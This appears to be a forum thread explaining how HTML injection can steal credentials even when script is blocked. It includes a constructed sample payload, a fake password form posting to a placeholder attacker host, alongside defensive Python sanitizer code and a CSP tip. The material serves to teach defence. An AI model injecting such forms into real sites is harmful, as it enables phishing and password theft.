
Okay, I understand now. Thanks.



If it's helpful: the "sting" of this attack is that it works even when you can't inject JavaScript into the page; that's why it's referred to as an "HTML injection attack".

The canonical HTML injection attack is cross-site scripting --- it's so canonical, in fact, that we usually just think about XSS, and not the generalized flaw of HTML injection. This is an illustration of how even closing off JavaScript as an attack vector doesn't stop HTML injection attacks from working.

See also:

http://lcamtuf.coredump.cx/postxss/


If you get HTML/CSS control isn't that game over? If I can get HTML loaded into your Gmail tab, then I can set up a fake login or "Please re-enter your password to continue" that has a form action of myserver. (Which then just redirects you to wherever you were.)

Injecting scripting is cute because it's far more flexible, but I'd guess an HTML injection is enough to get a fairly high rate of success, albeit a bit more noticeably.
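An added example (not from the thread) of the point made above: a filter that only strips `<script>` still lets the fake re-enter-your-password form through, while an allowlist sanitizer drops it. The payload is constructed for this example and `attacker.invalid` is a placeholder host; all function and class names are this example's own.

```python
import html
import re
from html.parser import HTMLParser

# Constructed sample of injected user content: a fake "re-enter your
# password" form. attacker.invalid is a placeholder, not a real host.
INJECTED = ('<p>Hi!</p><script>alert(1)</script>'
            '<form action="https://attacker.invalid/collect" method="post">'
            'Please re-enter your password to continue: '
            '<input name="password" type="password"><input type="submit">'
            '</form>')

def strip_script_only(fragment: str) -> str:
    """Naive blocklist filter: removes <script> only; every other tag survives."""
    return re.sub(r'(?is)<script\b.*?</script\s*>', '', fragment)

class AllowlistSanitizer(HTMLParser):
    """Allowlist filter: keeps a few attribute-free tags, drops unsafe containers."""
    ALLOWED = {'p', 'b', 'i', 'em', 'strong', 'br'}
    DROP_CONTENT = {'script', 'style', 'form', 'iframe', 'object'}

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip_depth = 0  # > 0 while inside a dropped container

    def handle_starttag(self, tag, attrs):
        if self.skip_depth:
            self.skip_depth += tag in self.DROP_CONTENT  # nested container
        elif tag in self.DROP_CONTENT:
            self.skip_depth = 1
        elif tag in self.ALLOWED:
            self.out.append(f'<{tag}>')  # attributes are never copied

    def handle_endtag(self, tag):
        if self.skip_depth:
            self.skip_depth -= tag in self.DROP_CONTENT
        elif tag in self.ALLOWED:
            self.out.append(f'</{tag}>')

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(html.escape(data, quote=False))

def sanitize(fragment: str) -> str:
    parser = AllowlistSanitizer()
    parser.feed(fragment)
    parser.close()
    return ''.join(parser.out)
```

As a second layer, a Content-Security-Policy `form-action 'self'` directive makes the browser refuse to submit any form on the page to another origin, so even markup that slips past the filter cannot post credentials elsewhere.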


Generally, we think of browser-based game-overs as being things that programmatically compromise users without engaging with the user's cognition.


Fair enough. Though in practice an HTML injection on a login page will have the same impact, usually eh?



